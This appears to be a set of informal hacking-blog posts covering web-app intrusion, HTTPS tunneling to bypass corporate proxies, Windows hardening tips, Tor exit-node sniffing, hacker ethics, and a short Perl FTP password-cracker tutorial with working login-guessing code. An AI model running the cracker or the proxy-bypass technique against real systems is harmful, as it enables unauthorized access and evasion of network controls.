if { web applications } then {system intrusion}

Now ! a days every one hears about ASP , PHP or Asp.net.

These frameworks have enabled programmers to make dynamic websites. Well web applications can be a heaven for some but a disaster for others .

Let me directly cut to the chase . Well for instance  you encounter a website www[.]dummy[.]org  which runs ASP. The Dummy.org’s server is guarded by a very sophisticated firewall. you find a script login.asp which has fields username and password ! You some how hack into it [For details about how to bypass core firewall and webapplication attacks visit Xc0re Knowledge Core ] and see that the login interface has a full control over the server and the website , you do nothing just log out !

Now after that who needs to hackinto the box , download a rootkit and try to hackin without authentication !

Peace !

How tunneling softwares compromise internal security

First off let me  explain what tunneling really is ? Well to make it simple i wont go into technical details but would say that for example you take a LAYS chips packet and put some thing  in side it , that you are usually not allowed to send and you seal it back and send it through  mail. Now the mail check post will check that its a Lays Chips packet and forward it and when it reaches your frnd ,he just unwraps it and gets the other wise forbidden object.

Now a little technical stuff ! Usually what local tunneling softwares use is HTTPs tunneling . that is , HTTPS is used as the Lays Chips packet and the data you want to tunnel is inside the https wrapped  packet.

Usually the network design is such that before the gateway firewall there is usually a proxy server. And in a firewall policy table a proxy has more rights then the normal employee. That is it is allowed to access the internet with full rights and access any remote port where as a normal employee has to go through the proxy to access the internet and for him/her there are further checks at the proxy . for example

A) Employee —-(direct external nw access not allowed)—-> X [Firewall]  X

B) Employee —– > [Proxy] ——- > [Firewall] ===>(Allowed)

In case of (B) the proxy has checks on orkut.com , youtube.com etc… so the employee cant access these websites. And Msn messenger / Yahoo messenger are blocked by the firewall.

Now that was the scenario. Now i will tell you people how it can be bypassed easily:

You download a software for instance   . It has a live server which it connects to using HTTPS or port 443 ! and you can even give the Proxy ip address that you are using. Now its so simple it sends the packet to the proxy that it wants to connect to port 443 of the live server now the innocent proxy server forwards the request to that server through the firewall thus once connected , one can send any data out by just feeding it to hopster!

Usually in softwares like msn messenger ,  yahoo messenger etc ask you to give local proxy address and you just have to give your local hosts ip address or 127.0.0.1 and the software’s port number and you are good to go !

Solution:

The Network Administrator  should install such softwares to check the remote servers they connect to and block the ips on the proxy and at the firewall end. And usually there is one server with single live ip address so once blocked it cannot connect.

Five hardcoded rules for System Security

I always watch people complaining that their data got currupted or they had a virus attack and they had to reinstall windows ! Well thats because people usually naive and innocent and the guy in the picture takes advantage of that innocence.

Well today ill tell you five hardcoded rules that when

you get your windows installed or you install it your self , you should follow the rules.

1. After installing your windows , install an antivirus immediately. [People usually tell me that they dont run an AV (Antivirus) because it slows down their system. Well i will give a solution for this problem later near the end].
2. Once the AV is up and running and is updated , install a personal firewall.
3. Once the firewall is installed be sure to check if the Windows autoupdater is enabled.
4. Now follow me : goto My computer . When the window opens goto the tools menu –> Folder options then when the folder options window opens goto the VIEW tab and under the hidden file & folder option , check show hidden files & folders then uncheck the hide extensions for known filetypes option.
5. Install An AntiSpyware ! normally it comes with the package of an AV but i prefer a standalone Antispyware program.

Well if one follows these rules and sticks to them , he/she wont need to reinstall the windows ,every time a virus comes.

Now referring to the problems:

• If the AV is heavy on your PC install a light weight AV . A very good example is AVAST AV
• Personal Firewalls , well pne of my favourite is ZoneAlarm

Well thats all ! hope every ones safe !

Writing a Simple Ftp cracker with perl.

Well PERL is a scripting language with the help of which one can make alot of good stuff ! Today ill show you how to create a simple ftp cracker !

DISCLAIMER: Every thing mentioned in this blog/post is for educational puposes. And I would not be held responsible for any illegal use of the material by any one .

Full version of the code is here

First off we include  NET::FTP:

use Net::FTP;

now what we will do is , create an ftp socket !

$ftp = Net::FTP->new($IPaddress, Timeout => 5);

where the IP address is the Ip address of the target system and 5 is the timeout to try out the next connection attempt.

Now we just have to add the code to check for username and password.

if($ftp->login(“ftp”,”ftp”)) {
$bogus = “CRACKED Username : ftp password: ftp “;

print “$bogus \n”;

}
In the abve code snippet the script checks against username = ftp  and password = ftp ! and if its attempt is a success itllgive a message :

CRACKED Username : ftp password: ftp !

Well one can hard code the username and passwords as i have done or get them from a file !

Peace !

Anonymous Proxies , a menace for hackers & innocent users

hey every body !

People usually hear that anonymous proxies should be banned because hackers use these to compromise systems. On the other hand proxies can be used to anonymously  surf  the internet. This is pretty comforting i know but we should all watch our step.

TOR (The Onion Router) , is a free software used for anonymity by almost every body nowadays. It is nearly impossible to trace a user  , once it starts using TOR ! It looks pretty awesome but it has a vulnerability or a weakness !

The weakness is the Exit-node sniffing problem.

In the above picture taken from Tor official Website
Alice wants to communicate anonymously with bib what would happen is that her traffic would be routed through the TOR network , exiting from the other side and reaching its destination that is BOB in this case. Now the until a packet reaches the last node of the TOR network or the Exit Node , the packet is encrypted but ass soon as it reaches the exit node it is converted to plain text , At that point if a hacker owns that exit node and simply runs a sniffer , he/she can get alot of info on the user. . Even FBI or Law enforcement agencies can use this trick to get a lead on the hackers. Many hackers and agencies are using this technique presently.

Hacking is an art !

Hacking is an art ! Most people think that its evil and learning it is totally a against the law. But i on the other hand would beg to differ. Learning to hack can make one better understand the  theory of attack and also can protect ones self against malicious attacks .
Hacking is specializing in the discovery of exploits in systems (for exploitation or prevention) [google.com / define:hacking]. Its a person own perspective to how he/she takes hacking , as an art form or as a crime.

So with the passage of time hackers were divided into different categories :

• Black Hat
• White Hat
• Grey Hat

Black Hat hackers or crackers are the ones who intrude the system for profit or malicious activities.

White Hats on the other hand hack or penetrate a system or a network by proper authorization of the owner and if they find a vulnerability they are allowed to recode and correct the vulnerability.

Grey Hats also do what white hats do but after the authorized penetration testing they do not correct the code  , and only give the report of their findings to the right person.

So this was an introduction of what hacking is and why hacking is not a crime but an art !